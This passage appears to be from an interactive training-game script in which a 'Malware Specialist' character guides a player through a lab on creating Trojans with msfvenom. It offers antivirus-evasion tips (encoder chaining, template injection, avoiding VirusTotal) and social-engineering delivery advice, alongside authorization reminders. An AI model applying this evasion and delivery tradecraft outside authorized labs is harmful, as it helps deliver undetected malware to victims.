-Malware Specialist: Practical tips for lab challenges: - -Malware Specialist: **Creating effective Trojans:** -- Start simple (windows/adduser or windows/exec) -- Test unencoded version first to ensure payload works -- Then add encoding, check if detection increases -- Finally try template injection for best evasion - -Malware Specialist: **Evasion tips:** -- Experiment with different encoders and iteration counts -- Shikata_ga_nai is popular but widely signatured - try others -- Chain multiple encoders for better results -- Use legitimate programs as templates (notepad, calc, small utilities) -- Test against ClamAV before trying against victim -- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors) - -Malware Specialist: **Delivery tips:** -- Make filename convincing (game.exe, important_document.exe, update.exe) -- Social engineering matters - victim needs reason to run it -- In real scenarios: icons, file properties, code signing all add legitimacy -- For lab: simple web delivery works fine - -Malware Specialist: **Verification:** -- Windows: `net user` shows created accounts -- Check Admin group: `net localgroup administrators` -- If payload fails, check syntax and password complexity requirements -- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123) - -Malware Specialist: **Troubleshooting:** -- Payload doesn't work? Test simpler version without encoding -- Still detected by AV? Try different template or more encoding iterations -- Apache won't start? `sudo service apache2 status` for error info -- Can't download from Kali? Check IP address (`ip a`) and firewall rules - -{instructor_rapport >= 50: - Malware Specialist: You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises. -} - -+ [Back to main menu] - -> malware_hub - -// =========================================== -// READY FOR PRACTICE -// =========================================== - -=== ready_for_practice === -Malware Specialist: Good. You've covered the core concepts. - -Malware Specialist: Lab objectives: -1. Create basic Trojan using msfvenom -2. Test against anti-malware (ClamAV) -3. Use encoding to evade detection -4. Inject payload into legitimate program template -5. Deliver via web server to Windows victim -6. Verify successful exploitation - -{ethical_awareness >= 10: - Malware Specialist: You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only. -} - -Malware Specialist: The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide. - -Malware Specialist: But also by criminals. The difference is authorization and intent. - -Malware Specialist: You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture. - -Malware Specialist: One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems. - -Malware Specialist: Now go create some Trojans. Good luck, Agent {player_name}. - -#exit_conversation -> END